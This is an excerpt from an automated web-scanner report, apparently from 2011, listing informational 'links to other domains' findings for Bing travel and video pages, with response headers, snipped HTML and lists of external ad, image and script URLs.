Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:38 GMT; domain=.bing.com; path=/


...[SNIP]...
</script>


<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,74.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,76.1')">Hotmail</a>
...[SNIP]...
</div>


                                                                                            <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.bing.com/travel/content/search?q=Indoor+Water+Parks%3a+Wilderness+Territory+Waterpark+Resort&layout=standard&show_faces=false&width=250&action=like&colorscheme=dark&height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:250px; height:35px;" allowTransparency="true"></iframe>
...[SNIP]...
<li>
                                               <a href="http://www.associatedcontent.com/article/7695098/the_best_waterparks_in_wisconsin_dells.html">The Best Waterparks in Wisconsin Dells, WI</a>
...[SNIP]...
<li>
                                               <a href="http://www.biztimes.com/daily/2011/1/31/biztimes-wisconsin-morning-headlines-wisconsin-dells-theme-park-owners-invest-in-the-strip">BizTimes Wisconsin Morning Headlines: Wisconsin Dells theme park owners invest in ‘the strip'</a>
...[SNIP]...
<li>
                                               <a href="http://www.wiscnews.com/portagedailyregister/sports/high-school/basketball/article_35888618-25ec-11e0-9ed3-001cc4c03286.html">PREP GIRLS BASKETBALL: Wisconsin Dells stops Mills, Westfield</a>
...[SNIP]...
<li>
                                               <a href="http://www.dailycardinal.com/news/wisconsin-dells-woman-overdoses-with-1-year-old-son-in-car-1.1903976">Wisconsin Dells woman overdoses with 1-year-old son in car</a>
...[SNIP]...
<div class="attribution">


                <a href="http://www.budgettravel.com" tabindex="60">
                   <img src="http://www.bing.com/travel//content/static/br-images/image-aHR0cDovL2JsdWJlZGJ1aWEwMjo4My9pL0Y0L0MwOUE0NzRBMjc4QjVCMEFDNjBDQjgwRjlDREU4LmdpZg.gif" a
...[SNIP]...
<li>
<a tabindex="60" href="http://www.budgettravel.com/bt-srv/gallery/1012_AirportLandings/index.html?jumpToPic=0">Budget Travel: 10 Scenic Airport Landings</a>
...[SNIP]...
<li>
<a tabindex="60" href="http://www.budgettravel.com/bt-srv/gallery/1011_WeirdestHotels/index.html?jumpToPic=0">Budget Travel: World's Weirdest Hotels 3.0</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.wildernessresort.com/">Wilderness Waterpark Resort in Wisconsin Dells | www ...</a>
...[SNIP]...
</cite> ·
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=wilderness+territory+waterpark+resort+wisconsin+dells&d=4776175598635299&mkt=en-US&w=2528275d,e78fa00a">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.wildernessterritory.com/">Explore the Wilderness Territory in Wisconsin Dells</a>
...[SNIP]...
</cite> ·
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=wilderness+territory+waterpark+resort+wisconsin+dells&d=4885830404539621&mkt=en-US&w=9a57c58,688bda2e">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://en.wikipedia.org/wiki/Wilderness_Territory">Wilderness Territory - Wikipedia, the free encyclopedia</a>
...[SNIP]...
</cite> ·
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=wilderness+territory+waterpark+resort+wisconsin+dells&d=4697010760778763&mkt=en-US&w=32a02586,476435a0">Cached page</a>
...[SNIP]...
</script>

<script src="http://adsyndication.msn.com/delivery/getads.js"
   type="text/javascript">

</script>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,87.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,89.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,91.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,93.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,95.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,97.1')">Help</a>
...[SNIP]...

17.231. http://www.bing.com/travel/deals/airline-ticket-deals.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/deals/airline-ticket-deals.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&form=trvcon

The response contains the following links to other domains:

http://0.r.msn.com/?ld=4v7oPYA6wwzlutUxMAjjuQ_Iatspv7LtWlxWHEVdHp20i2o2BEASP2vKHBDRuFqCvjOS1dHSzoP9Myq-LEupjiqY2Dm7aTs39IMA2fGfQeBo-kq8GnEv2n-HI_RBmgXP_USGEJTF5LjgwdIHZlfqmDCjtmNRwybWUMV5zJ_2LPfqc09_YiQTtaWWIZBpuK2URErwwnjPNfsR8gdUzaGrNK_YYOzRcFuIHMkEfhUZHg82xSbhffj_DdoOzFpfwFRImos336SK-aV3mDrXNQ1SRK4qHtUBXEfz1VUXDd_oh9xPc1VAlMnbu7SzVV2biBI0UJEBHIhRAmY3M9oRW5TkpvjL4yb1biO-FdE6VcMIOFbmoWq_0A6HLbZJk
http://0.r.msn.com/?ld=4v9caWP4fayCpultcpvWV4PcMlxx7ChEexxIN647xUQf2P_tpGgopxvSNYrRBlmqaTflIvFeQ_HqoHowyXds8MZAfZEo2_KyWd9ooagJfSJ_t8dZISgnK6W5xdUx7myN3n1jK0bfLLk9r5rnOCgSLbs7PpsJbSLs7sCEvIQgZSEl9QoCUdDfPn62XK-bxpFcIcl2sWm8YljCzGOB23aS7kKrv09q9nlKuhrfw0ALixqxgzyQquVHYegBQTQKbq4ge-s64dM3cA1NdVraCu-e72a0b_W8pNDrcaEC3O8ow3tM77KbjJlj_nO9GccTrcoimfzNpN_AA3A8h_rrzUpqH8qj0-3OMPnQ0OiiaD6RX1Ovt8ORaH7FZgM6wLbc5TdmUl2h8wXfgL58hSTs0PLrI7OVaiZMcsx0kAB1PtBR82-WDLoDCn4oDBPx8z3YpeSUzi3yx5PKTmYdK9uNMsZfGEe7VITaPmXmQeV7Ia6JaPLTaO97KTJ0McIRWJJ5CFgUwfW4AMHOFmeaEWVrmjKo7WeBv3w64b-nFADCfJ2403iG5Hl6KITxE5xGnhbpyTtlmvNVQJTGccUm2JDCyMw4nszk4CehMQJmNzPYAFAmLZ9cDkzzRAiorQva9XjxpwmRo5251xPXY6zbYw
http://0.r.msn.com/?ld=4vTU4jYU4h3v1fznz9Dr3UX92DVtKJO9ZZlUVoKOq0QF6CVBL0r6gecZA_3iOaQ21xfq15_jkMIutnE0OuY_62lOSOhsseSL7NrH1CJMEVgnw1y2WhCGc6aHyGZFOaPsyAboCQ9fVRbF8UxqTp1ANo2L1YrQJMTq3uaNvi1BVXIPAiRcVjb08flb08-jcKkP2KqtGvgSfydGoxqMr-dDevyebZo1FpBIYkep5lbCm8RhjWFLk38bodO-R2b7LSY7d5UWyQtrjL7tkNLBFPXrfCJDVUCUzuY0Ta3MSTIlf2nYSoJA3XECZjcz1v5y-57Sifq6t09WenCX6fZQKakYtGDzrM0Sx1P4zKOA
http://0.r.msn.com/?ld=4vVGhn6JbKlln878sRCpQQJDWv9tiJnVFpfmRG7MbR2l6gyyTvjaGFgdHQ01iFtn4xILyBsFk4GkItImbr5J9DMm3tSiCirCFkEE4_3w_VQ_zugdRbnY5DtalJl6gSNg9ZjDI18dAfKJkjCJdKbuo6UYa993lcx098aDTtO9v57hznoHINGmaV7Mdi80-u_26QH1gNHeVLNzxm_XhAhoZgn9QJxp_W3yW-AGR1td1iacMIHertsdcvj-bGr8qlUTE4P3I0vmj-3G1zr3kAdLiu6SlFnDjqlNkvobNRQIw6lpHJpcL5W6Y_K-0r_Ge95mGsfPs8xl2IeR8GC41G4dihyzVUCUx8zhoie2CwM-r3hXdXzGw0ECZjcz2t4QJbLOsJmBJxbXfPTsNIkXj3yI1ZQxSrYfmmv2x9NA
http://0.r.msn.com/?ld=4vl2295ssncRghR2HFV6c2uk4eBfWEDnvniE6gRMlAmDR_Rqqa1iuxoE6pyxvF_ouTWJFen3x4KIeQNmOQuL2q_PsVWNYTNmLwKJkElpNZlRF4cXr8hEvfMhZllnBWI2fcCGFw2IIw77wloTve8ic8rhC5p9H2JNQ8N5dqCt8e_19r15VqnacQOpIz0j8_CgGID5vEY7kW5R0POrdiLc99QRCeCxWcluNw4Hf1jvJBf25YswMzk0tqaCovFH1w3JOQUPCVQdmAZw_jknTTrIFURP4UNmPMXakvaj8CbVUSt281VAlMSHqTx3534N3YujCmI1VB9RAmY3M9Iyrb1MhXBxzKl7xYAL5xqxgDE0EEnJtQdudx6bmG3SU
http://13391.r.msn.com/?ld=4vieNB0BLQgjaUwnEIvSYgjWrPd7-nre7aQ-nPFqvbSz0IYpAVnKafdDpCfprNaXPt4NI3z_Q1o4AK5xlK9ga7eeRZ7q_YvcrbrsWhQBl98qVTxeGvIhHOL1sF9sKbvbWLVxzQDn8HtFaF2sO0QukVeUyVfGDxf1n21hRIOm82TK4aW-2rsLrzLU7ZG0F52hnMP_G5IOjc5IWTow8nz5UgUsV6gy6PyyH_pN61OF5qgsiwHT-nHRsx63WlDi6-TAfyNbULiVQ_OWzZ1KzN0KYxTbott6CoAgeqGZttt_QtfKZEdo9l769NZmV67zXp_7D_YE_lcsJV2I923csOt7xqeNfwD55uWDHX_7Csl9GkMoI1VAlMuKKt4mQvpJ44WyOLN26MIBAmY3M9wqMhUC2xUeP4Mu3JL80OBNJY8xcvt6c6zavN8SBBQ38
http://154875.r.msn.com/?ld=4vHm1Um2OQzUMtQN2b6UIsBHSJmql7ust6em2uY55nueW8nWF1MObwnjw_3xb27v3vhz5-4pxhbmrMEiXSs9xvlhvQPCiunS4XZmBSkXt9ffAGkWAz3gsAJ14eHT_Lyz-7NNB9LIYcg3dXXeesqgdfhsO32WkP7gZfgqo9IcnzpK3EgA0iUkZAMJu7D4lKUz8qK9TfncIv3YqpoT0G4TtRyD1JxpMALCqpHV-7K49UPkhD7jQpY_V6JWUatZmq2C1Q_6zf7xtZ6fAK0pFWRL1suzVUCUztc74gFd-czblU8DqvOt9gECZjcz2tfgLfA5ZUGsPVV1qSk4yvmUV0mXTSLNHZQOyluQqd-A
http://201283.r.msn.com/?ld=4vR_MwOPNbgDVw5mNRdIx0bJlfng4RPTtiKaeMK6qEU-UAa0XrFJ1zhCP90LgKxLjRgtAH08VlAplbRxdReqlEeRgWYc6R_TcCZtT5AZsjST7ISkcRZvdkyeVBvoRg8p_lxMxucBYPFiI5xOvivDGPHSB2nYU4G98b4lqe8irl2xKHbKKCbVznuDmTxfbRm4ARABs2cGhV30RzXaoZGpmGbYU7B8Nd1hMw6plAoCwEEgU-gIIYgPZk8PwOA-qaLlJPi_0ACaaflSf7k3ENRAnTQnuzN-X_fXj8IzgpWHUzse_nKzVav96MuvFewnaEDoK_NqFIRI2ehiAAYT1k2B6A4zVUCUxqx35fQ_wYs5hcHBFeHV3CECZjcz1FGi2J60Y6GOBP0mVByvOtAD14jg1ArKCoBGfjl8tlSg
http://632763.r.msn.com/?ld=4vWOQ5TZsmjD0eqH0DgBw5qd53qpqo8XXYStSXTaicRUzyRk08NXBGj7yziZlYuph8PW_Tqkbe44TwQwtuMDOtWNOjM4-iprdNYGZXlOm8DaoMi2XGLZ9hTLtzq1dzuPLb0Ktm_HsgDsCCAthoxBiaplDQ5EvXe2DmP8emex1xwYYEAlvHTP9YNnA5F_o1hV1k3udpGE182Z2bUpdejtPvHC9ZH0656gPZToS6Hva1bHI1VAlM-hdrd_yJJT9z96hzyLIeaRAmY3M9uslGy6Q6eSuFEJ4fOPH_LrqOu9Smvnt36xndqDNh-fw
http://816100.r.msn.com/?ld=4vAh4aWi0V2IOu-sOTm6b_0sqNXEvCGmSAHTCl52c0UDt2Di_20peHSZy8LjAi2tfXUIlK4u417kRSDWdoDEOeByvydxGSYLg065q5v3hGqMEeknoce4jDQQNP62sKTEZLl-mlLtHkjP-nWTXPUCRkNKKtjBHSECrDhrsTVQer2uT2hQcrBHA_HCXstpZcPH_QT_E8b614wajz9mGByIxauq27FCU2IbMCNNmZDm82Uls92vTEt7SzMQzKVw7lxmqz6d6VwpCkNeEs3wPlkdLlQTVUCUxGqVnlYENuaS5ne67D6HUlECZjcz21lFsWWUoPEByqgvcRhZfhnghd-esU4DEPAQ78I7PvWg
http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx
http://www.msn.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 108180
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Wed, 02 Feb 2011 15:43:43 GMT
Connection: close
Set-Cookie: lbc=905; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z6veri81lohd4eyz731qogjsh6trg_VID-5hgouum15ig37yz5flek5lnv1ko4_UID-; Domain=.bing.com; Expires=Fri, 01-Feb-2013 15:43:42 GMT; Path=/travel
Set-Cookie: JSESSIONID=939166F93ADAFBDCA0C706CED4E4498E; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=F623F5DE46884100AAF307099DE30493; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:42 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c9c879636e910490c875b1aa66da44d12; expires=Fri, 01-Feb-2013 15:43:42 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:42 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&ID=FD,245.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,247.1')">Hotmail</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals1_dealsPage'); return false;" href="http://0.r.msn.com/?ld=4vTU4jYU4h3v1fznz9Dr3UX92DVtKJO9ZZlUVoKOq0QF6CVBL0r6gecZA_3iOaQ21xfq15_jkMIutnE0OuY_62lOSOhsseSL7NrH1CJMEVgnw1y2WhCGc6aHyGZFOaPsyAboCQ9fVRbF8UxqTp1ANo2L1YrQJMTq3uaNvi1BVXIPAiRcVjb08flb08-jcKkP2KqtGvgSfydGoxqMr-dDevyebZo1FpBIYkep5lbCm8RhjWFLk38bodO-R2b7LSY7d5UWyQtrjL7tkNLBFPXrfCJDVUCUzuY0Ta3MSTIlf2nYSoJA3XECZjcz1v5y-57Sifq6t09WenCX6fZQKakYtGDzrM0Sx1P4zKOA">travel packages</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals2_dealsPage'); return false;" href="http://632763.r.msn.com/?ld=4vWOQ5TZsmjD0eqH0DgBw5qd53qpqo8XXYStSXTaicRUzyRk08NXBGj7yziZlYuph8PW_Tqkbe44TwQwtuMDOtWNOjM4-iprdNYGZXlOm8DaoMi2XGLZ9hTLtzq1dzuPLb0Ktm_HsgDsCCAthoxBiaplDQ5EvXe2DmP8emex1xwYYEAlvHTP9YNnA5F_o1hV1k3udpGE182Z2bUpdejtPvHC9ZH0656gPZToS6Hva1bHI1VAlM-hdrd_yJJT9z96hzyLIeaRAmY3M9uslGy6Q6eSuFEJ4fOPH_LrqOu9Smvnt36xndqDNh-fw">Cruise Discounts--75% Off</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals3_dealsPage'); return false;" href="http://816100.r.msn.com/?ld=4vAh4aWi0V2IOu-sOTm6b_0sqNXEvCGmSAHTCl52c0UDt2Di_20peHSZy8LjAi2tfXUIlK4u417kRSDWdoDEOeByvydxGSYLg065q5v3hGqMEeknoce4jDQQNP62sKTEZLl-mlLtHkjP-nWTXPUCRkNKKtjBHSECrDhrsTVQer2uT2hQcrBHA_HCXstpZcPH_QT_E8b614wajz9mGByIxauq27FCU2IbMCNNmZDm82Uls92vTEt7SzMQzKVw7lxmqz6d6VwpCkNeEs3wPlkdLlQTVUCUxGqVnlYENuaS5ne67D6HUlECZjcz21lFsWWUoPEByqgvcRhZfhnghd-esU4DEPAQ78I7PvWg">Holland America Line®</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights1_dealsPage'); return false;" href="http://0.r.msn.com/?ld=4vl2295ssncRghR2HFV6c2uk4eBfWEDnvniE6gRMlAmDR_Rqqa1iuxoE6pyxvF_ouTWJFen3x4KIeQNmOQuL2q_PsVWNYTNmLwKJkElpNZlRF4cXr8hEvfMhZllnBWI2fcCGFw2IIw77wloTve8ic8rhC5p9H2JNQ8N5dqCt8e_19r15VqnacQOpIz0j8_CgGID5vEY7kW5R0POrdiLc99QRCeCxWcluNw4Hf1jvJBf25YswMzk0tqaCovFH1w3JOQUPCVQdmAZw_jknTTrIFURP4UNmPMXakvaj8CbVUSt281VAlMSHqTx3534N3YujCmI1VB9RAmY3M9Iyrb1MhXBxzKl7xYAL5xqxgDE0EEnJtQdudx6bmG3SU">AA.com - Official Site</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights2_dealsPage'); return false;" href="http://13391.r.msn.com/?ld=4vieNB0BLQgjaUwnEIvSYgjWrPd7-nre7aQ-nPFqvbSz0IYpAVnKafdDpCfprNaXPt4NI3z_Q1o4AK5xlK9ga7eeRZ7q_YvcrbrsWhQBl98qVTxeGvIhHOL1sF9sKbvbWLVxzQDn8HtFaF2sO0QukVeUyVfGDxf1n21hRIOm82TK4aW-2rsLrzLU7ZG0F52hnMP_G5IOjc5IWTow8nz5UgUsV6gy6PyyH_pN61OF5qgsiwHT-nHRsx63WlDi6-TAfyNbULiVQ_OWzZ1KzN0KYxTbott6CoAgeqGZttt_QtfKZEdo9l769NZmV67zXp_7D_YE_lcsJV2I923csOt7xqeNfwD55uWDHX_7Csl9GkMoI1VAlMuKKt4mQvpJ44WyOLN26MIBAmY3M9wqMhUC2xUeP4Mu3JL80OBNJY8xcvt6c6zavN8SBBQ38">Cheap Flights at $29*</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights3_dealsPage'); return false;" href="http://201283.r.msn.com/?ld=4vR_MwOPNbgDVw5mNRdIx0bJlfng4RPTtiKaeMK6qEU-UAa0XrFJ1zhCP90LgKxLjRgtAH08VlAplbRxdReqlEeRgWYc6R_TcCZtT5AZsjST7ISkcRZvdkyeVBvoRg8p_lxMxucBYPFiI5xOvivDGPHSB2nYU4G98b4lqe8irl2xKHbKKCbVznuDmTxfbRm4ARABs2cGhV30RzXaoZGpmGbYU7B8Nd1hMw6plAoCwEEgU-gIIYgPZk8PwOA-qaLlJPi_0ACaaflSf7k3ENRAnTQnuzN-X_fXj8IzgpWHUzse_nKzVav96MuvFewnaEDoK_NqFIRI2ehiAAYT1k2B6A4zVUCUxqx35fQ_wYs5hcHBFeHV3CECZjcz1FGi2J60Y6GOBP0mVByvOtAD14jg1ArKCoBGfjl8tlSg">Cheap Flights: 60% Off</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights4_dealsPage'); return false;" href="http://0.r.msn.com/?ld=4v9caWP4fayCpultcpvWV4PcMlxx7ChEexxIN647xUQf2P_tpGgopxvSNYrRBlmqaTflIvFeQ_HqoHowyXds8MZAfZEo2_KyWd9ooagJfSJ_t8dZISgnK6W5xdUx7myN3n1jK0bfLLk9r5rnOCgSLbs7PpsJbSLs7sCEvIQgZSEl9QoCUdDfPn62XK-bxpFcIcl2sWm8YljCzGOB23aS7kKrv09q9nlKuhrfw0ALixqxgzyQquVHYegBQTQKbq4ge-s64dM3cA1NdVraCu-e72a0b_W8pNDrcaEC3O8ow3tM77KbjJlj_nO9GccTrcoimfzNpN_AA3A8h_rrzUpqH8qj0-3OMPnQ0OiiaD6RX1Ovt8ORaH7FZgM6wLbc5TdmUl2h8wXfgL58hSTs0PLrI7OVaiZMcsx0kAB1PtBR82-WDLoDCn4oDBPx8z3YpeSUzi3yx5PKTmYdK9uNMsZfGEe7VITaPmXmQeV7Ia6JaPLTaO97KTJ0McIRWJJ5CFgUwfW4AMHOFmeaEWVrmjKo7WeBv3w64b-nFADCfJ2403iG5Hl6KITxE5xGnhbpyTtlmvNVQJTGccUm2JDCyMw4nszk4CehMQJmNzPYAFAmLZ9cDkzzRAiorQva9XjxpwmRo5251xPXY6zbYw">Discount Airfare Prices</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights5_dealsPage'); return false;" href="http://0.r.msn.com/?ld=4v7oPYA6wwzlutUxMAjjuQ_Iatspv7LtWlxWHEVdHp20i2o2BEASP2vKHBDRuFqCvjOS1dHSzoP9Myq-LEupjiqY2Dm7aTs39IMA2fGfQeBo-kq8GnEv2n-HI_RBmgXP_USGEJTF5LjgwdIHZlfqmDCjtmNRwybWUMV5zJ_2LPfqc09_YiQTtaWWIZBpuK2URErwwnjPNfsR8gdUzaGrNK_YYOzRcFuIHMkEfhUZHg82xSbhffj_DdoOzFpfwFRImos336SK-aV3mDrXNQ1SRK4qHtUBXEfz1VUXDd_oh9xPc1VAlMnbu7SzVV2biBI0UJEBHIhRAmY3M9oRW5TkpvjL4yb1biO-FdE6VcMIOFbmoWq_0A6HLbZJk">Southwest - Official Site</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights6_dealsPage'); return false;" href="http://0.r.msn.com/?ld=4vVGhn6JbKlln878sRCpQQJDWv9tiJnVFpfmRG7MbR2l6gyyTvjaGFgdHQ01iFtn4xILyBsFk4GkItImbr5J9DMm3tSiCirCFkEE4_3w_VQ_zugdRbnY5DtalJl6gSNg9ZjDI18dAfKJkjCJdKbuo6UYa993lcx098aDTtO9v57hznoHINGmaV7Mdi80-u_26QH1gNHeVLNzxm_XhAhoZgn9QJxp_W3yW-AGR1td1iacMIHertsdcvj-bGr8qlUTE4P3I0vmj-3G1zr3kAdLiu6SlFnDjqlNkvobNRQIw6lpHJpcL5W6Y_K-0r_Ge95mGsfPs8xl2IeR8GC41G4dihyzVUCUx8zhoie2CwM-r3hXdXzGw0ECZjcz2t4QJbLOsJmBJxbXfPTsNIkXj3yI1ZQxSrYfmmv2x9NA">70% Off Cheap Flights?</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights7_dealsPage'); return false;" href="http://154875.r.msn.com/?ld=4vHm1Um2OQzUMtQN2b6UIsBHSJmql7ust6em2uY55nueW8nWF1MObwnjw_3xb27v3vhz5-4pxhbmrMEiXSs9xvlhvQPCiunS4XZmBSkXt9ffAGkWAz3gsAJ14eHT_Lyz-7NNB9LIYcg3dXXeesqgdfhsO32WkP7gZfgqo9IcnzpK3EgA0iUkZAMJu7D4lKUz8qK9TfncIv3YqpoT0G4TtRyD1JxpMALCqpHV-7K49UPkhD7jQpY_V6JWUatZmq2C1Q_6zf7xtZ6fAK0pFWRL1suzVUCUztc74gFd-czblU8DqvOt9gECZjcz2tfgLfA5ZUGsPVV1qSk4yvmUV0mXTSLNHZQOyluQqd-A">Cheap Flights - 65% OFF</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,258.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,260.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&ID=FD,262.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,264.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,266.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,268.1')">Help</a>
...[SNIP]...

17.232. http://www.bing.com/videos/browse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/browse

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/browse?from=en-us_msnhp

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.msn.com/0TO_/enus
http://g.msn.com/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.msn.com/Image.aspx?uuid=1ff58486-3972-4cf0-9a92-5c9b89c1d582&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=32ea9e4c-68c9-4ee9-b83c-ef072842cf73&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=3c8b3fe1-bfee-4ab2-b6c6-389df23dbb3c&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=5996a99f-59b4-434e-8c7e-413066209813&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=5b8ce2f5-6e16-4c2f-b7cf-fd6645600b73&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=7940a3ff-57bb-4e65-985f-178b70beed0e&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=8a0df08e-be39-c902-1539-90753b694598&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=c8279d4c-b6d4-4dfc-8666-23c8d5d710a3&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=d3919fc1-f09a-4c9a-9f0a-d44494d942be&w=160&h=90&so=4
http://img1.catalog.video.msn.com/Image.aspx?uuid=d51749e5-4860-42bb-a26d-a8f5792093fe&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img2.catalog.video.msn.com/Image.aspx?uuid=16b974a8-3d9a-4132-a8f7-9aa155cf4d1b&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=88535561-4156-4b99-9668-6268309cb93d&w=128&h=72&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=ac26b877-b2bc-4c23-8388-f2423bf000a1&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=c9575d7c-dc8e-417d-9505-aa0c48effc2b&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=ca4fa2f4-c25e-d7a7-2383-c0f1502d7e1b&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=cd97a6ad-9c54-90d5-c380-7ec0ce063d0a&w=160&h=90&so=4
http://img2.catalog.video.msn.com/Image.aspx?uuid=d6925ee8-776e-4ba0-82f7-f6aefae8a95a&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.msn.com/Image.aspx?uuid=15c0111b-f78d-40de-8ede-d7b3cefae831&w=128&h=72&so=4
http://img3.catalog.video.msn.com/Image.aspx?uuid=5f949448-6b16-f447-9ea0-29a68a76343d&w=160&h=90&so=4
